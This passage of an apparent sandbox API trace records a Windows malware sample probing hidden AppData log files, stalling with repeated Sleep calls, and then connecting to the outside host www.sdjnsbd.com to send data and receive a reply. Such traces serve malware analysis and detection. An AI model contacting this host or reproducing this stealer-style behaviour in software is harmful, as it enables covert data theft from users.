EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.387] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0193.387] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e650) returned 1 [0193.387] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.387] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.388] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0193.388] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894df00) returned 1 [0193.388] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.388] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.388] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0193.388] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d8d0) returned 1 [0193.388] Sleep (dwMilliseconds=0x7d0) [0193.389] Sleep (dwMilliseconds=0x7d0) [0193.391] Sleep (dwMilliseconds=0x7d0) [0193.393] Sleep (dwMilliseconds=0x7d0) [0193.394] Sleep (dwMilliseconds=0x7d0) [0193.396] Sleep (dwMilliseconds=0x7d0) [0193.397] Sleep (dwMilliseconds=0x7d0) [0193.399] Sleep (dwMilliseconds=0x7d0) [0193.400] Sleep (dwMilliseconds=0x7d0) [0193.402] Sleep (dwMilliseconds=0x7d0) [0193.403] Sleep (dwMilliseconds=0x7d0) [0193.405] Sleep (dwMilliseconds=0x7d0) [0193.406] Sleep (dwMilliseconds=0x7d0) [0193.408] Sleep (dwMilliseconds=0x7d0) [0193.409] Sleep (dwMilliseconds=0x7d0) [0193.411] Sleep (dwMilliseconds=0x7d0) [0193.412] Sleep (dwMilliseconds=0x7d0) [0193.414] Sleep (dwMilliseconds=0x7d0) [0193.415] Sleep (dwMilliseconds=0x7d0) [0193.417] Sleep (dwMilliseconds=0x7d0) [0193.418] Sleep (dwMilliseconds=0x7d0) [0193.420] Sleep (dwMilliseconds=0x7d0) [0193.421] Sleep (dwMilliseconds=0x7d0) [0193.423] Sleep (dwMilliseconds=0x7d0) [0193.424] Sleep (dwMilliseconds=0x7d0) [0193.426] Sleep (dwMilliseconds=0x7d0) [0193.427] Sleep (dwMilliseconds=0x7d0) [0193.429] Sleep (dwMilliseconds=0x7d0) [0193.430] Sleep (dwMilliseconds=0x7d0) [0193.432] Sleep (dwMilliseconds=0x7d0) [0193.433] Sleep (dwMilliseconds=0x7d0) [0193.435] Sleep (dwMilliseconds=0x7d0) [0193.436] Sleep (dwMilliseconds=0x7d0) [0193.438] Sleep (dwMilliseconds=0x7d0) [0193.439] Sleep (dwMilliseconds=0x7d0) [0193.441] Sleep (dwMilliseconds=0x7d0) [0193.442] Sleep (dwMilliseconds=0x7d0) [0193.444] Sleep (dwMilliseconds=0x7d0) [0193.445] Sleep (dwMilliseconds=0x7d0) [0193.447] Sleep (dwMilliseconds=0x7d0) [0193.449] Sleep (dwMilliseconds=0x7d0) [0193.450] Sleep (dwMilliseconds=0x7d0) [0193.452] Sleep (dwMilliseconds=0x7d0) [0193.453] Sleep (dwMilliseconds=0x7d0) [0193.455] Sleep (dwMilliseconds=0x7d0) [0193.473] Sleep (dwMilliseconds=0x7d0) [0193.475] Sleep (dwMilliseconds=0x7d0) [0193.476] Sleep (dwMilliseconds=0x7d0) [0193.478] Sleep (dwMilliseconds=0x7d0) [0193.479] Sleep (dwMilliseconds=0x7d0) [0193.481] Sleep (dwMilliseconds=0x7d0) [0193.482] Sleep (dwMilliseconds=0x7d0) [0193.484] Sleep (dwMilliseconds=0x7d0) [0193.485] Sleep (dwMilliseconds=0x7d0) [0193.487] Sleep (dwMilliseconds=0x7d0) [0193.488] Sleep (dwMilliseconds=0x7d0) [0193.490] Sleep (dwMilliseconds=0x7d0) [0193.491] Sleep (dwMilliseconds=0x7d0) [0193.494] Sleep (dwMilliseconds=0x7d0) [0193.495] Sleep (dwMilliseconds=0x7d0) [0193.497] Sleep (dwMilliseconds=0x7d0) [0193.498] Sleep (dwMilliseconds=0x7d0) [0193.500] Sleep (dwMilliseconds=0x7d0) [0193.501] Sleep (dwMilliseconds=0x7d0) [0193.503] Sleep (dwMilliseconds=0x7d0) [0193.504] Sleep (dwMilliseconds=0x7d0) [0193.506] Sleep (dwMilliseconds=0x7d0) [0193.507] Sleep (dwMilliseconds=0x7d0) [0193.509] Sleep (dwMilliseconds=0x7d0) [0193.510] Sleep (dwMilliseconds=0x7d0) [0193.512] Sleep (dwMilliseconds=0x7d0) [0193.513] Sleep (dwMilliseconds=0x7d0) [0193.515] Sleep (dwMilliseconds=0x7d0) [0193.516] Sleep (dwMilliseconds=0x7d0) [0193.518] Sleep (dwMilliseconds=0x7d0) [0193.519] Sleep (dwMilliseconds=0x7d0) [0193.521] Sleep (dwMilliseconds=0x7d0) [0193.522] Sleep (dwMilliseconds=0x7d0) [0193.524] Sleep (dwMilliseconds=0x7d0) [0193.525] Sleep (dwMilliseconds=0x7d0) [0193.527] Sleep (dwMilliseconds=0x7d0) [0193.528] Sleep (dwMilliseconds=0x7d0) [0193.530] Sleep (dwMilliseconds=0x7d0) [0193.531] Sleep (dwMilliseconds=0x7d0) [0193.533] Sleep (dwMilliseconds=0x7d0) [0193.534] Sleep (dwMilliseconds=0x7d0) [0193.536] Sleep (dwMilliseconds=0x7d0) [0193.537] Sleep (dwMilliseconds=0x7d0) [0193.539] Sleep (dwMilliseconds=0x7d0) [0193.540] Sleep (dwMilliseconds=0x7d0) [0193.542] Sleep (dwMilliseconds=0x7d0) [0193.543] Sleep (dwMilliseconds=0x7d0) [0193.545] Sleep (dwMilliseconds=0x7d0) [0193.546] Sleep (dwMilliseconds=0x7d0) [0193.548] Sleep (dwMilliseconds=0x7d0) [0193.549] Sleep (dwMilliseconds=0x7d0) [0193.551] Sleep (dwMilliseconds=0x7d0) [0193.552] Sleep (dwMilliseconds=0x7d0) [0193.554] Sleep (dwMilliseconds=0x7d0) [0193.555] Sleep (dwMilliseconds=0x7d0) [0193.557] Sleep (dwMilliseconds=0x7d0) [0193.558] Sleep (dwMilliseconds=0x7d0) [0193.560] Sleep (dwMilliseconds=0x7d0) [0193.561] Sleep (dwMilliseconds=0x7d0) [0193.563] Sleep (dwMilliseconds=0x7d0) [0193.564] Sleep (dwMilliseconds=0x7d0) [0193.566] Sleep (dwMilliseconds=0x7d0) [0193.567] Sleep (dwMilliseconds=0x7d0) [0193.569] Sleep (dwMilliseconds=0x7d0) [0193.570] Sleep (dwMilliseconds=0x7d0) [0193.572] Sleep (dwMilliseconds=0x7d0) [0193.573] Sleep (dwMilliseconds=0x7d0) [0193.575] Sleep (dwMilliseconds=0x7d0) [0193.576] Sleep (dwMilliseconds=0x7d0) [0193.578] Sleep (dwMilliseconds=0x7d0) [0193.579] Sleep (dwMilliseconds=0x7d0) [0193.581] Sleep (dwMilliseconds=0x7d0) [0193.582] Sleep (dwMilliseconds=0x7d0) [0193.584] Sleep (dwMilliseconds=0x7d0) [0193.585] Sleep (dwMilliseconds=0x7d0) [0193.587] Sleep (dwMilliseconds=0x7d0) [0193.588] Sleep (dwMilliseconds=0x7d0) [0193.590] Sleep (dwMilliseconds=0x7d0) [0193.591] Sleep (dwMilliseconds=0x7d0) [0193.594] Sleep (dwMilliseconds=0x7d0) [0193.595] Sleep (dwMilliseconds=0x7d0) [0193.596] Sleep (dwMilliseconds=0x7d0) [0193.598] Sleep (dwMilliseconds=0x7d0) [0193.599] Sleep (dwMilliseconds=0x7d0) [0193.601] Sleep (dwMilliseconds=0x7d0) [0193.602] Sleep (dwMilliseconds=0x7d0) [0193.604] Sleep (dwMilliseconds=0x7d0) [0193.605] Sleep (dwMilliseconds=0x7d0) [0193.607] Sleep (dwMilliseconds=0x7d0) [0193.608] Sleep (dwMilliseconds=0x7d0) [0193.610] Sleep (dwMilliseconds=0x7d0) [0193.612] Sleep (dwMilliseconds=0x7d0) [0193.614] Sleep (dwMilliseconds=0x7d0) [0193.615] Sleep (dwMilliseconds=0x7d0) [0193.617] Sleep (dwMilliseconds=0x7d0) [0193.618] Sleep (dwMilliseconds=0x7d0) [0193.620] Sleep (dwMilliseconds=0x7d0) [0193.621] Sleep (dwMilliseconds=0x7d0) [0193.623] Sleep (dwMilliseconds=0x7d0) [0193.624] Sleep (dwMilliseconds=0x7d0) [0193.626] Sleep (dwMilliseconds=0x7d0) [0193.627] Sleep (dwMilliseconds=0x7d0) [0193.629] Sleep (dwMilliseconds=0x7d0) [0193.630] Sleep (dwMilliseconds=0x7d0) [0193.632] Sleep (dwMilliseconds=0x7d0) [0193.633] Sleep (dwMilliseconds=0x7d0) [0193.635] Sleep (dwMilliseconds=0x7d0) [0193.636] Sleep (dwMilliseconds=0x7d0) [0193.686] Sleep (dwMilliseconds=0x7d0) [0193.688] Sleep (dwMilliseconds=0x7d0) [0193.689] Sleep (dwMilliseconds=0x7d0) [0193.691] Sleep (dwMilliseconds=0x7d0) [0193.692] Sleep (dwMilliseconds=0x7d0) [0193.694] Sleep (dwMilliseconds=0x7d0) [0193.695] Sleep (dwMilliseconds=0x7d0) [0193.697] Sleep (dwMilliseconds=0x7d0) [0193.698] Sleep (dwMilliseconds=0x7d0) [0193.700] Sleep (dwMilliseconds=0x7d0) [0193.701] Sleep (dwMilliseconds=0x7d0) [0193.703] Sleep (dwMilliseconds=0x7d0) [0193.704] Sleep (dwMilliseconds=0x7d0) [0193.706] Sleep (dwMilliseconds=0x7d0) [0193.707] Sleep (dwMilliseconds=0x7d0) [0193.709] Sleep (dwMilliseconds=0x7d0) [0193.710] Sleep (dwMilliseconds=0x7d0) [0193.712] Sleep (dwMilliseconds=0x7d0) [0193.713] Sleep (dwMilliseconds=0x7d0) [0193.715] Sleep (dwMilliseconds=0x7d0) [0193.716] Sleep (dwMilliseconds=0x7d0) [0193.718] Sleep (dwMilliseconds=0x7d0) [0193.719] Sleep (dwMilliseconds=0x7d0) [0193.721] Sleep (dwMilliseconds=0x7d0) [0193.722] Sleep (dwMilliseconds=0x7d0) [0193.724] Sleep (dwMilliseconds=0x7d0) [0193.725] Sleep (dwMilliseconds=0x7d0) [0193.727] Sleep (dwMilliseconds=0x7d0) [0193.728] Sleep (dwMilliseconds=0x7d0) [0193.730] Sleep (dwMilliseconds=0x7d0) [0193.731] Sleep (dwMilliseconds=0x7d0) [0193.733] Sleep (dwMilliseconds=0x7d0) [0193.734] Sleep (dwMilliseconds=0x7d0) [0193.736] Sleep (dwMilliseconds=0x7d0) [0193.737] Sleep (dwMilliseconds=0x7d0) [0193.739] Sleep (dwMilliseconds=0x7d0) [0193.740] Sleep (dwMilliseconds=0x7d0) [0193.742] Sleep (dwMilliseconds=0x7d0) [0193.743] Sleep (dwMilliseconds=0x7d0) [0193.745] Sleep (dwMilliseconds=0x7d0) [0193.746] Sleep (dwMilliseconds=0x7d0) [0193.748] Sleep (dwMilliseconds=0x7d0) [0193.749] Sleep (dwMilliseconds=0x7d0) [0193.751] Sleep (dwMilliseconds=0x7d0) [0193.752] Sleep (dwMilliseconds=0x7d0) [0193.754] Sleep (dwMilliseconds=0x7d0) [0193.755] Sleep (dwMilliseconds=0x7d0) [0193.757] Sleep (dwMilliseconds=0x7d0) [0193.758] Sleep (dwMilliseconds=0x7d0) [0193.760] Sleep (dwMilliseconds=0x7d0) [0193.761] Sleep (dwMilliseconds=0x7d0) [0193.763] Sleep (dwMilliseconds=0x7d0) [0193.764] Sleep (dwMilliseconds=0x7d0) [0193.766] Sleep (dwMilliseconds=0x7d0) [0193.767] Sleep (dwMilliseconds=0x7d0) [0193.769] Sleep (dwMilliseconds=0x7d0) [0193.770] Sleep (dwMilliseconds=0x7d0) [0193.772] Sleep (dwMilliseconds=0x7d0) [0193.773] Sleep (dwMilliseconds=0x7d0) [0193.775] Sleep (dwMilliseconds=0x7d0) [0193.776] Sleep (dwMilliseconds=0x7d0) [0193.778] Sleep (dwMilliseconds=0x7d0) [0193.779] Sleep (dwMilliseconds=0x7d0) [0193.781] Sleep (dwMilliseconds=0x7d0) [0193.782] Sleep (dwMilliseconds=0x7d0) [0193.784] Sleep (dwMilliseconds=0x7d0) [0193.785] Sleep (dwMilliseconds=0x7d0) [0193.787] Sleep (dwMilliseconds=0x7d0) [0193.788] Sleep (dwMilliseconds=0x7d0) [0193.790] Sleep (dwMilliseconds=0x7d0) [0193.791] Sleep (dwMilliseconds=0x7d0) [0193.794] Sleep (dwMilliseconds=0x7d0) [0193.795] Sleep (dwMilliseconds=0x7d0) [0193.797] Sleep (dwMilliseconds=0x7d0) [0193.798] Sleep (dwMilliseconds=0x7d0) [0193.800] Sleep (dwMilliseconds=0x7d0) [0193.801] Sleep (dwMilliseconds=0x7d0) [0193.803] Sleep (dwMilliseconds=0x7d0) [0193.804] Sleep (dwMilliseconds=0x7d0) [0193.806] Sleep (dwMilliseconds=0x7d0) [0193.807] Sleep (dwMilliseconds=0x7d0) [0193.809] Sleep (dwMilliseconds=0x7d0) [0193.810] Sleep (dwMilliseconds=0x7d0) [0193.812] Sleep (dwMilliseconds=0x7d0) [0193.813] Sleep (dwMilliseconds=0x7d0) [0193.815] Sleep (dwMilliseconds=0x7d0) [0193.816] Sleep (dwMilliseconds=0x7d0) [0193.818] Sleep (dwMilliseconds=0x7d0) [0193.819] Sleep (dwMilliseconds=0x7d0) [0193.821] Sleep (dwMilliseconds=0x7d0) [0193.822] Sleep (dwMilliseconds=0x7d0) [0193.824] Sleep (dwMilliseconds=0x7d0) [0193.825] Sleep (dwMilliseconds=0x7d0) [0193.827] Sleep (dwMilliseconds=0x7d0) [0193.828] Sleep (dwMilliseconds=0x7d0) [0193.830] Sleep (dwMilliseconds=0x7d0) [0193.831] Sleep (dwMilliseconds=0x7d0) [0193.833] Sleep (dwMilliseconds=0x7d0) [0193.834] Sleep (dwMilliseconds=0x7d0) [0193.836] Sleep (dwMilliseconds=0x7d0) [0193.837] Sleep (dwMilliseconds=0x7d0) [0193.839] Sleep (dwMilliseconds=0x7d0) [0193.840] Sleep (dwMilliseconds=0x7d0) [0193.842] Sleep (dwMilliseconds=0x7d0) [0193.843] Sleep (dwMilliseconds=0x7d0) [0193.845] Sleep (dwMilliseconds=0x7d0) [0193.846] Sleep (dwMilliseconds=0x7d0) [0193.848] Sleep (dwMilliseconds=0x7d0) [0193.849] Sleep (dwMilliseconds=0x7d0) [0193.851] Sleep (dwMilliseconds=0x7d0) [0193.852] Sleep (dwMilliseconds=0x7d0) [0193.854] Sleep (dwMilliseconds=0x7d0) [0193.855] Sleep (dwMilliseconds=0x7d0) [0193.857] Sleep (dwMilliseconds=0x7d0) [0193.858] Sleep (dwMilliseconds=0x7d0) [0193.860] Sleep (dwMilliseconds=0x7d0) [0193.861] Sleep (dwMilliseconds=0x7d0) [0193.863] Sleep (dwMilliseconds=0x7d0) [0193.864] Sleep (dwMilliseconds=0x7d0) [0193.866] Sleep (dwMilliseconds=0x7d0) [0193.867] Sleep (dwMilliseconds=0x7d0) [0193.869] Sleep (dwMilliseconds=0x7d0) [0193.870] Sleep (dwMilliseconds=0x7d0) [0193.872] Sleep (dwMilliseconds=0x7d0) [0193.873] Sleep (dwMilliseconds=0x7d0) [0193.875] Sleep (dwMilliseconds=0x7d0) [0193.876] Sleep (dwMilliseconds=0x7d0) [0193.878] Sleep (dwMilliseconds=0x7d0) [0193.879] Sleep (dwMilliseconds=0x7d0) [0193.881] Sleep (dwMilliseconds=0x7d0) [0193.884] Sleep (dwMilliseconds=0x7d0) [0193.885] Sleep (dwMilliseconds=0x7d0) [0193.887] Sleep (dwMilliseconds=0x7d0) [0193.888] Sleep (dwMilliseconds=0x7d0) [0193.890] Sleep (dwMilliseconds=0x7d0) [0193.891] Sleep (dwMilliseconds=0x7d0) [0193.894] Sleep (dwMilliseconds=0x7d0) [0193.895] Sleep (dwMilliseconds=0x7d0) [0193.897] Sleep (dwMilliseconds=0x7d0) [0193.898] Sleep (dwMilliseconds=0x7d0) [0193.900] Sleep (dwMilliseconds=0x7d0) [0193.901] Sleep (dwMilliseconds=0x7d0) [0193.903] Sleep (dwMilliseconds=0x7d0) [0193.904] Sleep (dwMilliseconds=0x7d0) [0193.906] Sleep (dwMilliseconds=0x7d0) [0193.907] Sleep (dwMilliseconds=0x7d0) [0193.909] Sleep (dwMilliseconds=0x7d0) [0193.911] socket (af=2, type=1, protocol=6) returned 0x2678 [0193.911] getaddrinfo (in: pNodeName="www.sdjnsbd.com", pServiceName="80", pHints=0x8790978*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x87909a8 | out: ppResult=0x87909a8*=0x862d740*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884020*(sa_family=2, sin_port=0x50, sin_addr="104.253.187.34"), ai_next=0x0)) returned 0 [0193.914] connect (s=0x2678, name=0x8884020*(sa_family=2, sin_port=0x50, sin_addr="104.253.187.34"), namelen=16) returned 0 [0194.070] send (s=0x2678, buf=0xa10808a*, len=170, flags=0) returned 170 [0194.070] setsockopt (s=0x2678, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0194.070] recv (in: s=0x2678, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 1869 [0194.256] closesocket (s=0x2678) returned 0 [0194.257] Sleep (dwMilliseconds=0x7d0) [0194.258] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.258] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.259] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0194.259] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b970) returned 1 [0194.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.259] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.259] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0194.259] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892c150) returned 1 [0194.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.259] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.259] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0194.259] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892bbb0) returned 1 [0194.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.259] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.259] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0194.259] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a890) returned 1 [0194.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.260] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.260] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0194.260] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b220) returned 1 [0194.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.260] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.260] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0194.260] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aec0) returned 1 [0194.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 